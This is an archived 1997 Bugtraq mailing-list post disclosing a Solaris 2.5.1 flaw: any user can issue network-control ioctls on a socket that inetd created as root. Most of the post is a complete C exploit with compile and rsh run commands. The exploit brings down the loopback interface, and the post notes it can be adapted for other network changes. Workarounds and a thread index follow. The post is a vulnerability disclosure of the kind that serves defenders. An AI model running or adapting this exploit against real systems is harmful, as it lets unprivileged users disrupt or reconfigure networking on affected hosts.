Bugtraq mailing list archives
Solaris 2.5.1 party piece
From: alan () LXORGUK UKUU ORG UK (Alan Cox)
Date: Thu, 19 Jun 1997 15:27:39 +0100
Well, CERT have had this for a year, AUSCERT for a couple of weeks, and now it's time Bugtraq had it.

cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck

solarisuck.c:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>

int main(int argc, char *argv[])
{
    struct ifreq please_break_me;

    /* fd 0 is the rsh connection socket inetd (root) created for us */
    strcpy(please_break_me.ifr_name, "lo0");
    please_break_me.ifr_flags = 0;          /* clear every flag, incl. IFF_UP */
    if (ioctl(0, SIOCSIFFLAGS, &please_break_me) == -1)
        perror("Damn it didn't work. Obviously not Solaris ;)");
    return 0;
}

You can adjust this to do other things. Basically any user can do network control requests on a root created socket descriptor.

Workarounds:

1. Disable rsh and any non root owned inetd tasks - breaks remote tar etc
2. Run an OS that the vendor doesn't take a year to fix bugs in

I have the original emails from Sun folks (Casper Dik, Alec Muffett and co) to prove Sun have sat on this for ages.

Alan
Current thread:
- Re: Netscape Admin Servers /tmp/deamonstat Matthew Archibald (Jun 17)
- Re: Netscape Admin Servers /tmp/deamonstat Joe Zbiciak (Jun 17)
- Solaris 2.5.1 party piece Alan Cox (Jun 19)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- Re: Core file anomalies under BSDi 3.0 Theo de Raadt (Jun 20)
- Re: Core file anomalies under BSDi 3.0 Ariel Biener (Jun 20)
- http://www.news.com/News/Item/0,4,11759,00.html Aleph One (Jun 20)
- Re: http://www.news.com/News/Item/0,4,11759,00.html Raymond Dijkxhoorn (Jun 21)
- Re: Core file anomalies under BSDi 3.0 Stacey Son (Jun 20)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- /cgi-bin/handler - more notes Razvan Dragomirescu (Jun 19)
- Re: Solaris 2.5.1 party piece Doug Hughes (Jun 19)
- Re: Solaris 2.5.1 party piece Bojan Zdrnja (Jun 20)
- Re: Solaris 2.5.1 party piece Joe Gross (Jun 20)